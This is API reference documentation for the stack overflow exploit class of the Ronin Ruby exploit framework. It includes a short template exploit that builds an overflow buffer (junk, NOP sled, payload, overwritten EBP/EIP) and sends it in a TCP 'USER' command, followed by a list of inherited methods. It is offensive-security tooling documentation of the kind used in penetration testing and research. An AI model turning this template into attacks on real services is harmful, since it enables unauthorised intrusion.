Class: Ronin::Exploits::StackOverflow

Inherits:

MemoryCorruption

• Object
• Exploit
• MemoryCorruption
• Ronin::Exploits::StackOverflow

Includes:

Mixins::StackOverflow

Defined in:

lib/ronin/exploits/stack_overflow.rb

Overview

Represents a stack overflow exploit.

Example

require 'ronin/exploits/stack_overflow'
require 'ronin/exploits/mixins/remote_tcp'

module Ronin
  module Exploits
    class MyExploit < StackOverflow

      register 'my_exploit'

      include Mixins::RemoteTCP

      def build
        ebp = 0x06eb9090
        eip = 0x1001ae86

        @buffer = buffer_overflow(length: 1024, nops: 16, payload: payload, bp: ebp, ip: eip)
      end

      def launch
        tcp_send "USER #{@buffer}"
      end

    end
  end
end

If you want more control over how the buffer is constructed:

def build
  ebp = 0x06eb9090
  eip = 0x1001ae86

  @buffer = junk(1024) + nops(16) + payload + stack_frame(ebp,eip)
end

Since:

• 1.0.0

Constant Summary

Constants included from Mixins::NOPS

Mixins::NOPS::NOPS

Class Method Summary

• .exploit_type ⇒ Symbol private

  Returns the type or kind of exploit.

Methods included from Mixins::StackOverflow

#buffer_overflow, #stack_frame

Methods included from Mixins::Text

#junk

Methods included from Mixins::NOPS

#nop, #nops, #perform_validate

Methods included from Mixins::Binary

#pack, #perform_validate, #platform

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from Exploit

#NotVulnerable, #Unknown, #Vulnerable, advisories, advisory, #build, #cleanup, disclosed?, disclosure_date, exploit, #exploit, #fail, #initialize, #launch, #perform_build, #perform_cleanup, #perform_launch, #perform_test, #perform_validate, quality, register, release_date, released?, software, software_versions, #test, #validate

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Class Method Details

.exploit_type ⇒ Symbol

This method is part of a private API. You should avoid using this method if possible, as it may be removed or be changed in the future.

Note:

This is used internally to map an exploit class to a printable type.

Returns the type or kind of exploit.

Returns:

• (Symbol)

Since:

• 1.0.0

# File 'lib/ronin/exploits/stack_overflow.rb', line 85

def self.exploit_type
  :stack_overflow
end